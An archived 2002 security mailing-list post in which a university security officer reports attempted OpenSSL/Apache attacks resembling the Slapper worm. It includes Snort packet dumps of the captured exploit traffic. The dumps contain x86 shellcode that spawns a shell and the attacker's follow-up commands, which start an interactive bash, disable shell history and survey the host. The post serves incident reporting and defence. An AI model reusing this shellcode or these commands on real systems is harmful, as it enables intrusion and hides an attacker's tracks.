NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Incidents> 2002-09

From: Russell Fulton (r.fulton_at_auckland.ac.nz)
Date: Tue Sep 17 2002 - 04:53:38 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

HI, we have just had 3 servers attacked via OpenSSL using very similar
exploits to the slapper worm. There are however differences:

1/ there was no port 80 scan or probes (targets had clearly been
selected before hand)
2/ there were many more iterations of the basic attack (around 30)

None of the systems were compromised.

Here are the snortsnarf summary of the attack on one system:

Earliest: 17:37:20.489882 on 09/17/2002 (times are UTC +1200)
Latest: 17:39:13.367289 on 09/17/2002

3 different signatures are present for 211.224.129.96 as a source

    * 28 instances of OpenSSL worm attack
    * 28 instances of Apache chunked encoding exploit, uname -a
    * 31 instances of Apache chunked encoding exploit, AAAAA padding

snort packet dumps from one iteration:

[**] Apache chunked encoding exploit, AAAAA padding [**]
09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x21C
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337
IpLen:20 DgmLen:526 DF
***AP*** Seq: 0xB9A41B14 Ack: 0xFC880B34 Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261451 45779712
81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0 ...........N.D".
A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33 .;{p.$..b...z.U3
D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17 ..U...S..%KOJ...
E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D .C1...t...".....
2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9 -..9..28%.......
D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB .k...j(i.A...FF.
A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC .t.[.Y...Ri.....
13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45 ...vO>..r....4ME
8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34 .~.......cD]../4
2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41 /.H,AAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41 AAAA........AAAA
01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00 ..iAAAA........
00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00 ....AAAAAAAA....
11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00 .....7=.........
10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90 ................
31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08 1....w..w..O .O.
B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3 ....1.....Q1..f.
07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6 .....Y1.9.u.f...
66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0 f9F.t.....1...1.
B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4 .?I..A..1...Q[..
CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 ..1.Ph//shh/bin.
E3 50 53 89 E1 99 B0 0B CD 80 .PS.......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] OpenSSL worm attack [**]
09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x6F
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340
IpLen:20 DgmLen:97 DF
***AP*** Seq: 0xB9A41D11 Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777
54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F TERM=xterm; expo
72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 rt TERM=xterm; e
78 65 63 20 62 61 73 68 20 2D 69 0A 0A xec bash -i..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] Apache chunked encoding exploit, uname -a [**]
09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800
len:0x64
211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341
IpLen:20 DgmLen:86 DF
***AP**F Seq: 0xB9A41D3E Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 163261618 45779777
75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20 unset HISTFILE;
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B uname -a; id; w;
0A 0A ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Looks to me as if someone has repackaged the exploits to use in a more
directed fashion.

-- Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand

"It aint necessarily so" - Gershwin

---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]